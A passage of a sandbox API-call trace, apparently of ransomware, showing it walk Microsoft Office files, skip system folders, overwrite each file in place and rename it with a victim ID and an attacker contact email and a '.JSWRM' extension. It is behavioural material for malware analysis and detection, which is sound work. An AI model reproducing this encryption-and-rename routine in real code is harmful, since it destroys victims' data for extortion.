[0115.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSQRY32.CHM", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0115.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSQRY32.CHM", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSQRY32.CHM", lpUsedDefaultChar=0x0) returned 11 [0115.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0115.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0115.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSQRY32.CHM", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0115.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSQRY32.CHM", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSQRY32.CHM", lpUsedDefaultChar=0x0) returned 11 [0115.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0115.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0115.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0115.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0115.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0115.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0115.087] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSQRY32.CHM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\msqry32.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0115.087] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=513666) returned 1 [0115.087] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.088] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0115.088] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0115.101] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.101] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0115.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0115.101] CloseHandle (hObject=0x238) returned 1 [0115.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0115.102] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0115.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0115.102] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0115.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0115.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0115.102] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0115.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0115.102] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0115.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0115.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0115.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0115.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0115.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0115.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0115.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0115.102] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSQRY32.CHM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\msqry32.chm"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSQRY32.CHM.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\msqry32.chm.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0115.278] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0115.278] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0115.278] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0115.278] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf632eb9d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf632eb9d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf632eb9d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x70c8, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="MSSRINTL.DLL", cAlternateFileName="")) returned 1 [0115.278] lstrcmpiW (lpString1="MSSRINTL.DLL", lpString2=".") returned 1 [0115.278] lstrcmpiW (lpString1="MSSRINTL.DLL", lpString2="..") returned 1 [0115.278] lstrcmpiW (lpString1="MSSRINTL.DLL", lpString2="...") returned 1 [0115.278] lstrcmpiW (lpString1="MSSRINTL.DLL", lpString2="windows") returned -1 [0115.278] lstrcmpiW (lpString1="MSSRINTL.DLL", lpString2="recovery") returned -1 [0115.278] lstrcmpiW (lpString1="MSSRINTL.DLL", lpString2="perflogs") returned -1 [0115.278] lstrcmpiW (lpString1="MSSRINTL.DLL", lpString2="documents and settings") returned 1 [0115.278] lstrcmpiW (lpString1="MSSRINTL.DLL", lpString2="$RECYCLE.BIN") returned 1 [0115.278] lstrcmpiW (lpString1="MSSRINTL.DLL", lpString2="system volume information") returned -1 [0115.278] lstrcmpiW (lpString1="MSSRINTL.DLL", lpString2="msocache") returned 1 [0115.278] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0115.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSSRINTL.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0115.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSSRINTL.DLL", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSSRINTL.DLL", lpUsedDefaultChar=0x0) returned 12 [0115.278] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0115.278] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0115.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSSRINTL.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0115.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSSRINTL.DLL", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSSRINTL.DLL", lpUsedDefaultChar=0x0) returned 12 [0115.278] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0115.278] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0115.278] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0115.278] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x46b2075, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x46b2075, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x46b2075, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xd7a, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="NETWORK.CSS", cAlternateFileName="")) returned 1 [0115.278] lstrcmpiW (lpString1="NETWORK.CSS", lpString2=".") returned 1 [0115.278] lstrcmpiW (lpString1="NETWORK.CSS", lpString2="..") returned 1 [0115.278] lstrcmpiW (lpString1="NETWORK.CSS", lpString2="...") returned 1 [0115.278] lstrcmpiW (lpString1="NETWORK.CSS", lpString2="windows") returned -1 [0115.278] lstrcmpiW (lpString1="NETWORK.CSS", lpString2="recovery") returned -1 [0115.279] lstrcmpiW (lpString1="NETWORK.CSS", lpString2="perflogs") returned -1 [0115.279] lstrcmpiW (lpString1="NETWORK.CSS", lpString2="documents and settings") returned 1 [0115.279] lstrcmpiW (lpString1="NETWORK.CSS", lpString2="$RECYCLE.BIN") returned 1 [0115.279] lstrcmpiW (lpString1="NETWORK.CSS", lpString2="system volume information") returned -1 [0115.279] lstrcmpiW (lpString1="NETWORK.CSS", lpString2="msocache") returned 1 [0115.279] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0115.279] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NETWORK.CSS", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0115.279] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NETWORK.CSS", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NETWORK.CSS", lpUsedDefaultChar=0x0) returned 11 [0115.279] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0115.279] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0115.279] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NETWORK.CSS", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0115.279] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NETWORK.CSS", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NETWORK.CSS", lpUsedDefaultChar=0x0) returned 11 [0115.279] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0115.279] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0115.279] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0115.279] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0115.279] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0115.279] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0115.279] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\NETWORK.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\network.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0115.280] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3450) returned 1 [0115.280] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.281] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd70) returned 0x206858 [0115.281] ReadFile (in: hFile=0x238, lpBuffer=0x206858, nNumberOfBytesToRead=0xd70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesRead=0x345e89c*=0xd70, lpOverlapped=0x0) returned 1 [0115.282] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.282] WriteFile (in: hFile=0x238, lpBuffer=0x206858*, nNumberOfBytesToWrite=0xd70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesWritten=0x345e898*=0xd70, lpOverlapped=0x0) returned 1 [0115.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x206858 | out: hHeap=0x1e0000) returned 1 [0115.283] CloseHandle (hObject=0x238) returned 1 [0115.283] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0115.283] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0115.283] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0115.283] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0115.283] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0115.283] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0115.283] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0115.283] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0115.283] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0115.283] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0115.283] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0115.283] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0115.283] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0115.283] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0115.283] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0115.283] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0115.283] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\NETWORK.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\network.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\NETWORK.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\network.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0115.284] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0115.284] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0115.284] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0115.284] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x46b2075, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x46b2075, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x46b2075, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x734, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="NETWORK1.VRD", cAlternateFileName="")) returned 1 [0115.284] lstrcmpiW (lpString1="NETWORK1.VRD", lpString2=".") returned 1 [0115.284] lstrcmpiW (lpString1="NETWORK1.VRD", lpString2="..") returned 1 [0115.284] lstrcmpiW (lpString1="NETWORK1.VRD", lpString2="...") returned 1 [0115.284] lstrcmpiW (lpString1="NETWORK1.VRD", lpString2="windows") returned -1 [0115.284] lstrcmpiW (lpString1="NETWORK1.VRD", lpString2="recovery") returned -1 [0115.284] lstrcmpiW (lpString1="NETWORK1.VRD", lpString2="perflogs") returned -1 [0115.284] lstrcmpiW (lpString1="NETWORK1.VRD", lpString2="documents and settings") returned 1 [0115.284] lstrcmpiW (lpString1="NETWORK1.VRD", lpString2="$RECYCLE.BIN") returned 1 [0115.284] lstrcmpiW (lpString1="NETWORK1.VRD", lpString2="system volume information") returned -1 [0115.285] lstrcmpiW (lpString1="NETWORK1.VRD", lpString2="msocache") returned 1 [0115.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0115.285] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NETWORK1.VRD", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0115.285] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NETWORK1.VRD", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NETWORK1.VRD", lpUsedDefaultChar=0x0) returned 12 [0115.285] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0115.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0115.285] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NETWORK1.VRD", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0115.285] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NETWORK1.VRD", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NETWORK1.VRD", lpUsedDefaultChar=0x0) returned 12 [0115.285] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0115.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0115.285] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0115.285] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0115.285] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0115.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0115.285] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\NETWORK1.VRD" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\network1.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0115.285] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1844) returned 1 [0115.286] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x730) returned 0x20c6c0 [0115.286] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x730, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x730, lpOverlapped=0x0) returned 1 [0115.287] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.287] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x730, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x730, lpOverlapped=0x0) returned 1 [0115.289] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0115.289] CloseHandle (hObject=0x238) returned 1 [0115.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0115.289] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0115.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0115.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0115.291] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0115.291] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0115.291] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0115.291] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0115.291] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0115.292] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0115.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0115.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0115.292] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0115.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0115.292] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0115.292] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0115.292] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\NETWORK1.VRD" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\network1.vrd"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\NETWORK1.VRD.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\network1.vrd.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0115.293] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0115.293] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0115.293] HeapFree (in: hHeap=0x1e0000, 